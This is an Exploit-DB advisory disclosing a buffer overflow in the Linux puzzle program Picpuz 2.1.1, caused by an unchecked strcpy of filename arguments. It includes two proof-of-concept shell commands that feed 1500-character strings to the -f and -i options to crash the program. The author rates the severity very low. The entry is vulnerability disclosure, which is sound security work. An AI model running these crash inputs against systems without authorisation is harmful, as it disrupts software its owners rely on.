Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)

EDB-ID:

10634

CVE:

N/A

Author:

$andman

Type:

dos

Platform:

Linux

Published:

2009-12-24

# Exploit Title: Picpuz Buffer Overflow DoS/PoC <=2.1.1
# Date: 24 Dec, 2009
# Author: sandman, n4mdn4s [4T] gmail [D0T] com
# Software Link: http://kornelix.squarespace.com/picpuz/<http://kornelix.squarespace.com/printoxx/>, http://kornelix.squarespace.com/storage/downloads/picpuz-2.1.1.tar.gz<http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz>

# Version: <= 2.1.1
# Tested on: Fedora 12
# CVE: None
# Code:

Description:
"from website"
Picpuz is a free Linux "jigsaw puzzle" program.

You can take almost any image (jpeg, tiff, png ...) and scramble it into many pieces (tens to hundreds). You can

then reassemble the picture using the mouse to move the pieces around.


Vulnerability:
Picpuz does not check the length of input filename/directory thus overwriting the buffer [1000 in size] with a call to strcpy.


Proof Of Concept:
Image filename overflow:
$ ./picpuz -f $(python -c 'print "A"*1500')

Directory filename overflow:
$ ./picpuz -i $(python -c 'print "A"*1500')


Severity: Very Low

#$